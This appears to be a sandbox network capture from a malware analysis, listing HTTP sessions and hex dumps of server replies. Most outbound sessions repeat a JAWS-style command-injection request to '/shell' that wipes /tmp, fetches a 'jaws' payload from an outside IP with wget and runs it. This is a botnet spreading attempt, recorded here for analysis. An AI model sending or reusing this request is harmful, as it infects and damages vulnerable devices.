                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.198034048 CET1286INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html; charset=UTF-8
                                                            Referrer-Policy: no-referrer
                                                            Content-Length: 1555
                                                            Date: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                            Jan 26, 2024 15:31:01.198071957 CET450INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                            Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            2192.168.2.233294076.164.156.1180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.082396030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.213304043 CET383INHTTP/1.1 404 Not Found
                                                            Server: micro_httpd
                                                            Cache-Control: no-cache
                                                            Date: Fri, 26 Jan 2024 08:31:00 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            3192.168.2.2356140104.24.252.7380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.089993954 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            4192.168.2.2338332173.26.90.11680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.122555971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            5192.168.2.234803813.35.117.24780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.184559107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.301332951 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            6192.168.2.2341948108.157.169.2680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.192186117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.315687895 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            7192.168.2.2339926212.36.196.980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.231762886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.496026993 CET344INData Raw: 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 31 20 4a 61 6e 20 32 30 30 30 20
                                                            Data Ascii: 93.123.85.149/jaws;sh+/tmp/jaws 400 Bad RequestServer: Date: Sat, 01 Jan 2000 09:44:53 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=2000Content-Type: text/htmlContent-length: 130<HTML><HEAD><TITLE>Document Error: Bad Re


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            8192.168.2.2360688192.169.174.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.265786886 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.823961973 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Server: Apache
                                                            X-Powered-By: PHP/5.6.40
                                                            Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            Set-Cookie: 8f259f7046a447d759332edc1fc038d7=jqau9qej1c044lhu5t6kff6736; path=/; HttpOnly
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Last-Modified: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 75 69 64 65 64 20 54 6f 75 72 73 20 6f 66 20 41 6e 74 65 6c 6f 70 65 20 53 6c 6f 74 20 43 61 6e 79 6f 6e 20 61 6e 64 20 43 61 74 68 65 64 72 61 6c 20 43 61 6e 79 6f 6e 20 62 79 20 43 68 69 65 66 20 54 73 6f 73 69 65 20 61 6e 64 20 68 69 73 20 70 72 6f 66 65 73 73 69 6f 6e 61 6c 20 67 75 69 64 65 73 2e 20 45 6e 6a 6f 79 20 4e 61 74 69 76 65 20 41 6d 65 72 69 63 61 6e 20 63 75 6c 74 75 72 65 20 61 6e 64 20 6c 69 76 65 20 66 6c 75 74 65 20 6d 75 73 69 63 20 77 68 69 6c 65 20 74 6f 75 72 69 6e 67 20 41 6e 74 65 6c 6f 70 65 20 43 61 6e 79 6f 6e 20 61 6e 64 20 43 61 74 68 65 64 72 61 6c 20 43 61 6e 79 6f 6e 20 6f 6e 20 74 68 65 20 4e 61 76 61 6a 6f 20 4e 61 74 69 6f 6e 20 52 65 73 65 72 76 61 74 69 6f 6e 2e 20 43 61 6c 6c 20 39 32 38 2d 36 34 35 2d 35 35 39 34 20 66 6f 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 6e 74 65 6c 6f 70 65 20 53 6c 6f 74 20 43 61 6e 79 6f 6e 20 54 6f 75 72 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f
                                                            Data Ascii: <!DOCTYPE html><html lang="en-GB" dir="ltr"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="utf-8" /><meta name="description" content="Guided Tours of Antelope Slot Canyon and Cathedral Canyon by Chief Tsosie and his professional guides. Enjoy Native American culture and live flute music while touring Antelope Canyon and Cathedral Canyon on the Navajo Nation Reservation. Call 928-645-5594 for information." /><meta name="generator" content="Joomla! - Open Source Content Management" /><title>Antelope Slot Canyon Tours</title><link href="/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /><link href="/plugins/
                                                            Jan 26, 2024 15:31:01.823982000 CET1286INData Raw: 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61
                                                            Data Ascii: system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engines/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href=
                                                            Jan 26, 2024 15:31:01.823998928 CET1286INData Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 67 74 72 61 6e 73 6c 61 74 65 2f 74 6d 70 6c 2f 6c 61 6e 67 2f 61 6c 74 5f
                                                            Data Ascii: ound-repeat:no-repeat;background-image:url('/modules/mod_gtranslate/tmpl/lang/alt_flagsa.png');} a.alt_flag:hover {background-image:url('/modules/mod_gtranslate/tmpl/lang/alt_flags.png');} a.alt_flag img {border:0;} </sty
                                                            Jan 26, 2024 15:31:01.824016094 CET1286INData Raw: 66 20 28 67 74 65 20 49 45 20 38 29 26 28 6c 74 65 20 49 45 20 39 29 5d 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72
                                                            Data Ascii: f (gte IE 8)&(lte IE 9)]> <script type="text/javascript" src="/media/gantry5/assets/js/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/>
                                                            Jan 26, 2024 15:31:01.824039936 CET1286INData Raw: 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: ="g-container"> <section id="g-navigation"> <div class="g-grid"> <div class="g-block size-100"> <div id="menu-8681-particle" class="g-content g-partic
                                                            Jan 26, 2024 15:31:01.824058056 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: <span class="g-menu-item-content"> <span class="g-menu-item-title">TOURS</span> </span> <span class="g-menu-parent-indicator" data-g-menupa
                                                            Jan 26, 2024 15:31:01.824075937 CET1286INData Raw: 6f 74 20 43 61 6e 79 6f 6e 20 53 63 65 6e 69 63 20 54 6f 75 72 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: ot Canyon Scenic Tour</span> </span> </a> </li>
                                                            Jan 26, 2024 15:31:01.824095011 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20
                                                            Data Ascii: </a> </li> </ul> </div> </div> </li> </ul> </li>
                                                            Jan 26, 2024 15:31:01.824263096 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: <li class="g-menu-item g-menu-item-type-url g-menu-item-217 "> <a class="g-menu-item-container" href="https://www.antelop
                                                            Jan 26, 2024 15:31:01.824281931 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: </li> <li class="g-menu-item g-menu-item-type-component g-menu-item-207 g-standard "> <a class="g-menu-item-containe
                                                            Jan 26, 2024 15:31:01.824297905 CET1286INData Raw: 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 2d 69 6e 2d 75 70 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75
                                                            Data Ascii: g-inactive g-fade-in-up g-dropdown-right"> <li class="g-dropdown-column"> <div class="g-grid"> <div class="g-block size-100"> <ul class="g-sublevel"> <li


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            9192.168.2.2346740178.68.44.8380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.295766115 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            10192.168.2.233295676.164.156.1180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.342251062 CET391INHTTP/1.1 400 Bad Request
                                                            Server: micro_httpd
                                                            Cache-Control: no-cache
                                                            Date: Fri, 26 Jan 2024 08:31:00 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            11192.168.2.234680018.164.249.7880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.375993013 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.800551891 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
